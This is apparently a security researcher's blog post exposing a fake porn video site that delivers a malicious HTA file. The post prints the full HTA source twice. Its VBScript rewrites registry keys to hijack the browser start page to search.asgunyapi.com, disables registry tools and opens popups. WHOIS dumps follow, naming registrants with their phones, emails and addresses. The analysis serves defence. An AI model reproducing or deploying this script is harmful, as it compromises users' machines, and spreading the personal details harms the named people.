Whilst investigating a site earlier, I stumbled upon a site claiming to be a vanilla porn site. Not surprisingly, it turned out to be slightly more than that.This site offers its victims the usual player you're used to seeing on the likes of YouTube - with a major difference. Instead of the fake codec, or actual video, an HTA is downloaded and executed, that contains;
<html><head>
<hta:application id=hta_note_id
applicationName=hta_note_name
showInTaskBar=no
caption=no
innerBorder=no
selection=no
scroll=no
contextmenu=no />
<script language=javascript>
window.resizeTo(0, 0);
window.moveTo(0, 0);
</script>
<SCRIPT language=vbs>
self.MoveTo 0, 0
Set shell = CreateObject("WScript.Shell")
shell.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\URL\Prefixes\\mirc","http://search.asgunyapi.com","REG_SZ"
shell.regwrite "HKLM\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"
shell.regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"
shell.regwrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://search.asgunyapi.com","REG_SZ"
shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://search.asgunyapi.com","REG_SZ"
shell.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\\DisableRegistryTools","00000001","REG_DWORD"
self.Close
</SCRIPT>
<script language="JavaScript">
<!--
function FP_openNewWindow(w,h,nav,loc,sts,menu,scroll,resize,name,url) {//v1.0
var windowProperties=''; if(nav==false) windowProperties+='toolbar=no,'; else
windowProperties+='toolbar=yes,'; if(loc==false) windowProperties+='location=no,';
else windowProperties+='location=yes,'; if(sts==false) windowProperties+='status=no,';
else windowProperties+='status=yes,'; if(menu==false) windowProperties+='menubar=no,';
else windowProperties+='menubar=yes,'; if(scroll==false) windowProperties+='scrollbars=no,';
else windowProperties+='scrollbars=yes,'; if(resize==false) windowProperties+='resizable=no,';
else windowProperties+='resizable=yes,'; if(w!="") windowProperties+='width='+w+',';
if(h!="") windowProperties+='height='+h; if(windowProperties!="") {
if( windowProperties.charAt(windowProperties.length-1)==',')
windowProperties=windowProperties.substring(0,windowProperties.length-1); }
window.open(url,name,windowProperties);
}
// -->
</script>
</head>
<body onbeforeunload="FP_openNewWindow('1024', '768', false, false, false, false, true, false, 'Duyuru', /*href*/'http://search.asgunyapi.com')">
</body>
<hta:application id=hta_note_id
applicationName=hta_note_name
showInTaskBar=no
caption=no
innerBorder=no
selection=no
scroll=no
contextmenu=no />
<script language=javascript>
window.resizeTo(0, 0);
window.moveTo(0, 0);
</script>
<SCRIPT language=vbs>
self.MoveTo 0, 0
Set shell = CreateObject("WScript.Shell")
shell.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\URL\Prefixes\\mirc","http://search.asgunyapi.com","REG_SZ"
shell.regwrite "HKLM\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"
shell.regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"
shell.regwrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://search.asgunyapi.com","REG_SZ"
shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://search.asgunyapi.com","REG_SZ"
shell.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\\DisableRegistryTools","00000001","REG_DWORD"
self.Close
</SCRIPT>
<script language="JavaScript">
<!--
function FP_openNewWindow(w,h,nav,loc,sts,menu,scroll,resize,name,url) {//v1.0
var windowProperties=''; if(nav==false) windowProperties+='toolbar=no,'; else
windowProperties+='toolbar=yes,'; if(loc==false) windowProperties+='location=no,';
else windowProperties+='location=yes,'; if(sts==false) windowProperties+='status=no,';
else windowProperties+='status=yes,'; if(menu==false) windowProperties+='menubar=no,';
else windowProperties+='menubar=yes,'; if(scroll==false) windowProperties+='scrollbars=no,';
else windowProperties+='scrollbars=yes,'; if(resize==false) windowProperties+='resizable=no,';
else windowProperties+='resizable=yes,'; if(w!="") windowProperties+='width='+w+',';
if(h!="") windowProperties+='height='+h; if(windowProperties!="") {
if( windowProperties.charAt(windowProperties.length-1)==',')
windowProperties=windowProperties.substring(0,windowProperties.length-1); }
window.open(url,name,windowProperties);
}
// -->
</script>
</head>
<body onbeforeunload="FP_openNewWindow('1024', '768', false, false, false, false, true, false, 'Duyuru', /*href*/'http://search.asgunyapi.com')">
</body>
You'll have noticed the hijacks to search.asgunyapi.com. This chap is hosted by HostGator (already fired off an abuse report), and should hopefully be down soon;
Host: search.asgunyapi.com
Current IP: 74.54.218.98
IP PTR: gator441.hostgator.com
ASN: 21844 74.52.0.0/14 THEPLANET-AS - ThePlanet.com Internet Services, Inc.
Registration Service Provided By: REG2C
Contact: +90.2242248640
Website: http://www.reg2c.com
Domain Name: ASGUNYAPI.COM
Registrant:
lider
halil -(279214) (strom_@msn.com)
istanbul
istanbul
,34100
TR
Tel. +90.05374067878
Fax. +90.02126179416
Creation Date: 22-Mar-2010
Expiration Date: 22-Mar-2011
Domain servers in listed order:
ns882.hostgator.com
ns881.hostgator.com
Administrative Contact:
lider
halil -(279214) (strom_@msn.com)
istanbul
istanbul
,34100
TR
Tel. +90.05374067878
Fax. +90.02126179416
Technical Contact:
lider
halil -(279214) (strom_@msn.com)
istanbul
istanbul
,34100
TR
Tel. +90.05374067878
Fax. +90.02126179416
Billing Contact:
lider
halil -(279214) (strom_@msn.com)
istanbul
istanbul
,34100
TR
Tel. +90.05374067878
Fax. +90.02126179416
Status:LOCKED
Contact: +90.2242248640
Website: http://www.reg2c.com
Domain Name: ASGUNYAPI.COM
Registrant:
lider
halil -(279214) (strom_@msn.com)
istanbul
istanbul
,34100
TR
Tel. +90.05374067878
Fax. +90.02126179416
Creation Date: 22-Mar-2010
Expiration Date: 22-Mar-2011
Domain servers in listed order:
ns882.hostgator.com
ns881.hostgator.com
Administrative Contact:
lider
halil -(279214) (strom_@msn.com)
istanbul
istanbul
,34100
TR
Tel. +90.05374067878
Fax. +90.02126179416
Technical Contact:
lider
halil -(279214) (strom_@msn.com)
istanbul
istanbul
,34100
TR
Tel. +90.05374067878
Fax. +90.02126179416
Billing Contact:
lider
halil -(279214) (strom_@msn.com)
istanbul
istanbul
,34100
TR
Tel. +90.05374067878
Fax. +90.02126179416
Status:LOCKED
The best part however, is the delivery site itself - this little chap is hosted by the infamously crimeware friendly, RapidSwitch. RapidSwitch is an ISP with a history of housing everything from warez to phishing to malware. Incidentally, I recently fired off an abuse report to RapidSwitch, and was rather surprised to find they'd finally gone ahead with their promise of blocking me from e-mailing them (better late than never I suppose, they said they were doing so 2 years ago - but little hint RapidSwitch - it's not the best way of convincing someone to unblacklist you).
Host: kalitepornolar.org
Current IP: 95.154.242.200
IP PTR: Resolution failed
ASN: 29131 95.154.192.0/18 RAPIDSWITCH-AS RapidSwitch
Domain ID:D160877627-LROR
Domain Name:KALITEPORNOLAR.ORG
Created On:09-Dec-2010 08:57:49 UTC
Last Updated On:09-Dec-2010 13:51:59 UTC
Expiration Date:09-Dec-2011 08:57:49 UTC
Sponsoring Registrar:GoDaddy.com, Inc. (R91-LROR)
Status:CLIENT DELETE PROHIBITED
Status:CLIENT RENEW PROHIBITED
Status:CLIENT TRANSFER PROHIBITED
Status:CLIENT UPDATE PROHIBITED
Status:TRANSFER PROHIBITED
Registrant ID:CR69417596
Registrant Name:okan delikaya
Registrant Street1:arn. merk mah eyupsultan cad
Registrant Street2:arnavutkoy
Registrant Street3:
Registrant City:istanbul
Registrant State/Province:arnavutkoy
Registrant Postal Code:34275
Registrant Country:TR
Registrant Phone:+90.05302731122
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email: okan@kriptex.com
Admin ID:CR69417598
Admin Name:okan delikaya
Admin Street1:arn. merk mah eyupsultan cad
Admin Street2:arnavutkoy
Admin Street3:
Admin City:istanbul
Admin State/Province:arnavutkoy
Admin Postal Code:34275
Admin Country:TR
Admin Phone:+90.05302731122
Admin Phone Ext.:
Admin FAX:
Admin FAX Ext.:
Admin Email: okan@kriptex.com
Tech ID:CR69417597
Tech Name:okan delikaya
Tech Street1:arn. merk mah eyupsultan cad
Tech Street2:arnavutkoy
Tech Street3:
Tech City:istanbul
Tech State/Province:arnavutkoy
Tech Postal Code:34275
Tech Country:TR
Tech Phone:+90.05302731122
Tech Phone Ext.:
Tech FAX:
Tech FAX Ext.:
Tech Email: okan@kriptex.com
Name Server:NS2.KALITELIPORNOLAR.ORG
Name Server:NS1.KALITELIPORNOLAR.ORG
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
DNSSEC:Unsigned
Domain Name:KALITEPORNOLAR.ORG
Created On:09-Dec-2010 08:57:49 UTC
Last Updated On:09-Dec-2010 13:51:59 UTC
Expiration Date:09-Dec-2011 08:57:49 UTC
Sponsoring Registrar:GoDaddy.com, Inc. (R91-LROR)
Status:CLIENT DELETE PROHIBITED
Status:CLIENT RENEW PROHIBITED
Status:CLIENT TRANSFER PROHIBITED
Status:CLIENT UPDATE PROHIBITED
Status:TRANSFER PROHIBITED
Registrant ID:CR69417596
Registrant Name:okan delikaya
Registrant Street1:arn. merk mah eyupsultan cad
Registrant Street2:arnavutkoy
Registrant Street3:
Registrant City:istanbul
Registrant State/Province:arnavutkoy
Registrant Postal Code:34275
Registrant Country:TR
Registrant Phone:+90.05302731122
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email: okan@kriptex.com
Admin ID:CR69417598
Admin Name:okan delikaya
Admin Street1:arn. merk mah eyupsultan cad
Admin Street2:arnavutkoy
Admin Street3:
Admin City:istanbul
Admin State/Province:arnavutkoy
Admin Postal Code:34275
Admin Country:TR
Admin Phone:+90.05302731122
Admin Phone Ext.:
Admin FAX:
Admin FAX Ext.:
Admin Email: okan@kriptex.com
Tech ID:CR69417597
Tech Name:okan delikaya
Tech Street1:arn. merk mah eyupsultan cad
Tech Street2:arnavutkoy
Tech Street3:
Tech City:istanbul
Tech State/Province:arnavutkoy
Tech Postal Code:34275
Tech Country:TR
Tech Phone:+90.05302731122
Tech Phone Ext.:
Tech FAX:
Tech FAX Ext.:
Tech Email: okan@kriptex.com
Name Server:NS2.KALITELIPORNOLAR.ORG
Name Server:NS1.KALITELIPORNOLAR.ORG
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
DNSSEC:Unsigned
One of the many sites leading to these fake movie sites is turkpornoizle.tk, which should be down shortly.
Host: turkpornoizle.tk
Current IP: 212.7.200.223
IP PTR: Resolution failed
ASN: 16265 212.7.192.0/19 LEASEWEB LEASEWEB AS
Posts
No comments:
Post a Comment